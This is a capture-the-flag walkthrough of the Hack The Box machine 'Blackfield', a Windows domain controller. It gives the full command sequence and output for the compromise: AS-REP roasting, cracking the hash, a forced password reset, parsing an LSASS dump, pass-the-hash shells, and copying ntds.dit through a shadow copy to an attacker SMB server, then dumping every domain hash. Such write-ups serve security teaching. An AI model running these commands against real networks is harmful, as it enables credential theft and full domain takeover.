Blackfield

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Wed Apr  5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.099s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
49676/tcp open  unknown

# Nmap done at Wed Apr  5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Apr  5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.067s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   filtered netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49676/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-04-05T15:36:56
|_  start_date: N/A
|_clock-skew: 8h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 seconds

Port 53 is open, so we can enumerate all the possible subdomains for the blackfield.local domain name with dig.

dig any blackfield.local @10.10.10.192

; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local.              IN      ANY

;; ANSWER SECTION:
blackfield.local.       600     IN      A       10.10.10.192
blackfield.local.       3600    IN      NS      dc01.blackfield.local.
blackfield.local.       3600    IN      SOA     dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600
blackfield.local.       600     IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; ADDITIONAL SECTION:
dc01.blackfield.local.  3600    IN      A       10.10.10.192
dc01.blackfield.local.  3600    IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; Query time: 36 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Wed Apr 05 11:36:42 CEST 2023
;; MSG SIZE  rcvd: 199

Let's add all these subdomain names to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.192    blackfield.local dc01.blackfield.local hostmaster.blackfield.local

Let' keep enumerating the domain controller. We can check if there is any interesting share hosted in the SMB server.

smbmap -H 10.10.10.192 -u 'guest'

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        NO ACCESS       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        NO ACCESS       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          NO ACCESS       Logon server share

If we check the share, we'll see a bunch of directories called like possible users.

smbmap -H 10.10.10.192 -u 'guest' -r profiles$

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        profiles$                                       READ ONLY
        .\profiles$\*
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    .
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ..
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    AAlleni
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABarteski
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABekesz
...
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZScozzari
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZTimofeeff
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZWausik

Exploitation

Let's put those usernames in the users file.

smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' > users

As the domain controller has the Kerberos service exposed, we can verify if any of these users is valid using kerbrute.

kerbrute_linux_amd64 userenum --dc 10.10.10.192 -d blackfield.local users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop

2023/04/05 12:38:10 >  Using KDC(s):
2023/04/05 12:38:10 >   10.10.10.192:88

2023/04/05 12:38:31 >  [+] VALID USERNAME:       audit2020@blackfield.local
2023/04/05 12:40:23 >  [+] VALID USERNAME:       support@blackfield.local
2023/04/05 12:40:28 >  [+] VALID USERNAME:       svc_backup@blackfield.local
2023/04/05 12:40:53 >  Done! Tested 314 usernames (3 valid) in 162.879 seconds

Now that we have a list of valid users, put them into a file, and let's try to do an ASREPRoast attack.

ASREPRoast attack: when a user does not need pre-authentication, it is possible to obtain a TGT, without knowing the user's credentials, which contain data encrypted with the user's hash, which can be used for offline cracking.

impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid_users

• -no-pass don't ask for password.

• -usersfile file which contains user per line.

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3
[-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set

We get a hash of the support user. Let's try to break it with john.

john -w=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL)     
1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Let's use the credentials that we have to enumerate the domain controller more in depth with bloodhound-python.

bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local

INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 10S

Now, we have to start BloodHound. First, we have to start neo4j.

neo4j console

Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. You’ll have to change the password.

On a new console, run BloodHound.

bloodhound -nosandbox

Then log in with the credentials you set up earlier.

Then, click on the Upload Data button on the right section and select all the .json files generated with bloodhound-python.

Once all the .json files are uploaded, search for the user support@blackfield.local, and we'll see in the First Degree Object Control section that the support user has the privilege to change the password of the audit2020 user.

We can change the password of the audit2020 user as support using rpcclient.

rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$"

Verify that the credentials are valid.

crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:alfa8sa123$

Now that we have valid credentials for the audit2020 user, let's see if we have access to any other share.

smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        READ ONLY       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        READ ONLY       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          READ ONLY       Logon server share

There is one more interesting share in which we have read permissions. Let's mount the forensic share to our local system.

mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123!$,domain=BLACKFIELD.local,rw"

Inside there is a directory called memory_analysis.

ls -l /mnt/forensic/

total 0
drwxr-xr-x 2 root root 0 Feb 23  2020 commands_output
drwxr-xr-x 2 root root 0 May 28  2020 memory_analysis
drwxr-xr-x 2 root root 0 Feb 23  2020 tools

This directory has ZIP files. There is one called lsass.zip. If this file has the LSASS memory compressed in it, we could extract passwords and hashes from it.

ls -l /mnt/forensic/memory_analysis/

total 506000
-rwxr-xr-x 1 root root  37876530 May 28  2020 conhost.zip
-rwxr-xr-x 1 root root  24962333 May 28  2020 ctfmon.zip
-rwxr-xr-x 1 root root  23993305 May 28  2020 dfsrs.zip
-rwxr-xr-x 1 root root  18366396 May 28  2020 dllhost.zip
-rwxr-xr-x 1 root root   8810157 May 28  2020 ismserv.zip
-rwxr-xr-x 1 root root  41936098 May 28  2020 lsass.zip
-rwxr-xr-x 1 root root  64288607 May 28  2020 mmc.zip
-rwxr-xr-x 1 root root  13332174 May 28  2020 RuntimeBroker.zip
-rwxr-xr-x 1 root root 131983313 May 28  2020 ServerManager.zip
-rwxr-xr-x 1 root root  33141744 May 28  2020 sihost.zip
-rwxr-xr-x 1 root root  33756344 May 28  2020 smartscreen.zip
-rwxr-xr-x 1 root root  14408833 May 28  2020 svchost.zip
-rwxr-xr-x 1 root root  34631412 May 28  2020 taskhostw.zip
-rwxr-xr-x 1 root root  14255089 May 28  2020 winlogon.zip
-rwxr-xr-x 1 root root   4067425 May 28  2020 wlms.zip
-rwxr-xr-x 1 root root  18303252 May 28  2020 WmiPrvSE.zip

Transfer it to our current directory, and decompress it.

cp /mnt/forensic/memory_analysis/lsass.zip .

unzip lsass.zip

Now we have the lsass.DMP file. Usually, the LSASS memory is dumped from the local Windows system using Mimikatz, but as we don't have access to the system we can use a tool called pypykatz.

pypykatz lsa minidump lsass.DMP

INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
...
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)

...

Among other hashes, we get the NTLM hash of the svc_backup, which seems to be in the Remote Management Users because we can get a shell via WinRM. Then, we'll be able to grab the user flag.

evil-winrm -i 10.10.10.192 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt
3920bb317a0bef51027e2852be64b543

Privilege Escalation

Indeed, the svc_backup user is a member of the Remote Management Users, but it is also a member of the Backup Operators group.

The Backup Operators group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows you to traverse any folder and list the folder contents and copy a file from a folder, even if nothing else is giving you permission.

net user svc_backup

User name                    svc_backup
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2020 10:54:48 AM
Password expires             Never
Password changeable          2/24/2020 10:54:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/5/2023 9:00:19 AM

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

The idea is to copy the ntds.dit file to our system, so we can extract the NTLM hashes of all the domain users. We can follow the article Dumping Domain Password Hashes.First, set a simple SMB server on the current directory.

impacket-smbserver smbFolder $(pwd) -smb2support

Now, go the \windows\temp, create the directory privEsc, and get in there.

cd \windows\temp

mkdir privEsc

cd privEsc

Then, create a new file called diskshadow.txt and upload it to the victim machine. Make sure to add a blank space at the end of each line.

nano diskshadow.txt

upload /home/alfa8sa/HTB/machines/blackfield/diskshadow.txt

set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% z: 

Run the diskshadow tool together with the diskshadow.txt to create a new logical disk and create a copy of C:\ in it.

diskshadow.exe /s diskshadow.txt

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  4/5/2023 12:35:51 PM

-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable.

Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}

        * Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018}               %someAlias%
                - Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 4/5/2023 12:35:52 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018}
The shadow copy was successfully exposed as z:\.
->

Now, we should see the ntds.dit in the z: disk.

dir z:\windows\ntds

    Directory: z:\windows\ntds


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2023   2:34 PM           8192 edb.chk
-a----         4/5/2023  12:35 PM       10485760 edb.log
-a----        2/23/2020   9:41 AM       10485760 edb00004.log
-a----        2/23/2020   9:41 AM       10485760 edb00005.log
-a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
-a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
-a----        2/23/2020   9:41 AM       10485760 edbtmp.log
-a----         4/5/2023  12:30 PM       18874368 ntds.dit
-a----         4/5/2023  12:30 PM          16384 ntds.jfm
-a----         4/5/2023  12:30 PM         434176 temp.edb

Let's copy it to our local SMB server with robocopy.

robocopy /b z:\windows\ntds \10.10.14.5\smbFolder\ ntds.dit

We will also need a copy of HKLM\system.

reg save HKLM\system \10.10.14.5\smbFolder\system

Finally, we can extract the NTLM hashes with secretsdump.

impacket-secretsdump -system system -ntds ntds.dit LOCAL

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...

As we have the NTLM hash of the administrator user, we can get a shell. Then, all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
4375a629c7c67c8e29db269060c955cb